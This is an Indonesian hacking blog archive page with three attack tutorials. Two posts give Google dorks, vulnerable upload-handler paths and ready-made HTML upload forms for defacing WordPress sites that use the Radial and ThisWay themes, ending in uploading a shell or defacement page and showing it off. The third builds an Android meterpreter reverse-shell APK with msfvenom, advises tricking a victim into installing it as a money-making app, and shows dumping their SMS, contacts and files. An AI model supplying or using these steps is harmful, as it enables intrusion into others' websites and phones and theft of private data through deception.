Juni 2017 - HeroIT

HeroIT

Learn until whenever

  •

    • Minggu, 18 Juni 2017

    Deface Wordpress plugin theme Radial

    Juni 18, 2017 3
    Deface Wordpress plugin theme Radial







    Hey ho kali ini afik mau share tutor deface wordpress plugin theme radial
    oke langsung aja eaaaa biar gak kelamaan

    Bahan

    1. dork : inurl:/wp-content/themes/radial-theme/ (kembangin lagi eaaaa)

    2.exploit : /wp-content/themes/radial-theme/functions/upload-handler.php

    3. csrf :

    <form enctype="multipart/form-data"action="http://target.com/wp-content/themes/radial-theme/functions/upload-handler.php"
    method="post">
    Pilih file lu: <input name="orange_themes" type="file" /><br>
    <input type="submit" value="UPLOAD!" />
    </form>

    (copy csrf ke notepad /notepad ++, simpan dengan extensi html)

    4. script deface / shell



    oke kita langsung ke langkah2 nya


    1. Dorking gugel  dulu

    2. kalo udah pilih salah satu site

    3. masukan exploit di belakang nama site nya
        contoh : www.target.com/wp-content/themes/radial-theme/functions/upload-handler.php

    4. kalo vuln maka akan ada tulisan "error"

    5. nah tinggal masukin site ke csrf kita tadi

    6. buka csrf nya lewat web browser

    7.upload deh script deface ato shell deface kita

    8.kalo udah muncul file upload an kita

    9. cara melihat hasil deface nya kek gini contoh yaa

    site.com/wp-content/uploads/tahun/bulan/nama file

    10. taraaaaa tampilan website nya pun berubah, tinggal pamerin ke temen lo deh :v kalo lo hekel               awokawokawkok :v


    oke sekian tutor dari gw, special thanks buat BERANDAL
    kalo gk paham bisa lihat video nya di bawah  sini
    By di 3 komentar:
    Label:

    Selasa, 13 Juni 2017

    Exploitasi Android Satu Jaringan Di BackBox

    Juni 13, 2017 0
    Exploitasi Android Satu Jaringan Di BackBox




    Hello Afik fans
    kali ini gw mau share tutorial exploitasi android satu jaringan
    untuk os nya gw pake Linux BackBox :v
    nah korban nya pakek android saya :v (biar gampang)
    sebenernya mau pakek punya adek gw tapi gk mau dia ny, takut dilihat sms nya
    kali awokawokawoka:v


    Langsung  aja yaa


    BAHAN :

    1. Tolls metasploit
    2. Payload / Backdoor untuk exploitasi anroid nya (untuk tutor kali ini extensi nya apk)
    3. ketampanan (ini paling penting :v)

    oh yaa ini harus satu jaringan yaa ???? misalkan kalian pakek wifi indischool ya korban juga harus pakek wifi indischool :v kalo untuk beda jaringan
    next tutor aja eaaa, lagian ini juga sbenernya iseng2 doang :v


    LANGKAH :

    1. Buat payload nya dengan mengetikan perintah berikut :

    msfvenom -p android/meterpreter/reverse_tcp lhost= (ip address kalian)  lport=4444 R > /root/android.apk

       lhost : ip address yang kalian dapat  ketikan ifconfig untuk melihat

       lport : 4444

    2. Kalo payload sudah di buat, kirim payload nya ke korban, nah disini yakin kan korban biar mau install payload yg sudah terbuat tadi
    misal bilang kalo ini aplikasi penghasil uang :v (missal)

    3. tunggu korban mengsintall payload nya

    4. sambil nunggu buka exploit nya dengan mengetikan perintah msfconsole

    5. ketikan perintah berikut di setiap session ny


    •        use exploit/multi/handler
    •        set payload android/meterpreter/reverse_tcp
    •        set lhost (isikan ip address kita tadi)
    •        set lport 4444
    •        exploit
    6. kita tunggu sampai korban mengeksekusi nya

    7. kalo korban berhasil terexploitasi hasil nya kek gini


    kalo udah kalian bisa ngapain aja :v

     bisa lihat perintah ya dengan mengetik help

     saya disini coba melihat sms dengan mengetikan dump_sms
     dan melihat kontak dengan perintah dump_contact
     dan melihat isi sdcard saya dengan perintah ls sdcard
     dan masih banyak oke sekian dulu yaa kuota gw habis neh :v

    kalo bingung bisa lihat video nya di sini
    By di Tidak ada komentar:
    Label:

    Kamis, 08 Juni 2017

    Deface plugin wordpress-themes-thisway

    Juni 08, 2017 1
    Deface plugin wordpress-themes-thisway













    Hello fans ku afik lovers, haters ku, kamu ku :*

    kali ini guai mau share tutor deface plugin wordpress-themes-thisway

    sebenernya ini teknik lama hmm tapi gpp eaaa ?? yang udah expert minggir dulu

    ini buat newbie oke ??

     langsung aja ea ????

    BAHAN :

    1. DORK : inurl:/wp-content/themes/ThisWay/ (kembangin eaaaa beb )

    2. CSRF :

    <form
    action="http://target.co.li/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php"
    method="post"
    enctype="multipart/form-data">
    <label for="file">Filename:</label>
    <input type="file" name="Filedata" ><br>
    <input type="submit" name="submit" value="UPLOAD">
    </form>

    copy csrf nya and simpen dalam extensi html contoh csrf.html


    3. exploit :

     /wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php


    Langkah


    1. dorking gugel dulu

    2. pilih salah satu site nya

    3.kalo udah masukin exploit di belakang site nya

       contoh : target.com/wp-content/themes/ThisWay/includes/uploadify             /upload_settings_image.php

    4. kalo vuln ada tuisan kek gini :  {"status":"NOK", "ERR":"This file is incorect"}

    5. nah selanjut nya masukin site nya ke csrf

    6. kalo udah buka csrf nya di web browser

    7. terus upload deh script / shell /txt mu di sini gua upload sc aja

    8. kalo udah muncul nama file yang sudah kita upload tadi

    9. lihat hasil nya begini cara lihat hasil deface an kita

        target.com/wp-content/uploads/tahun/bulan/namafile.html

    10. nah kalo udah muncul script deface kita, copy link nya pamerin deh ke    temen2 lo wkwkwkwkwk :v

    oke sekian dulu tutor dari gua

    special thanks ==>BERANDAL<==

    AND I LOVE YOU SOMEONE :*
    jangan lupa like fp kami di facebook

    kalo bingung bisa lihat video nya disini :
    By di 1 komentar:
    Label: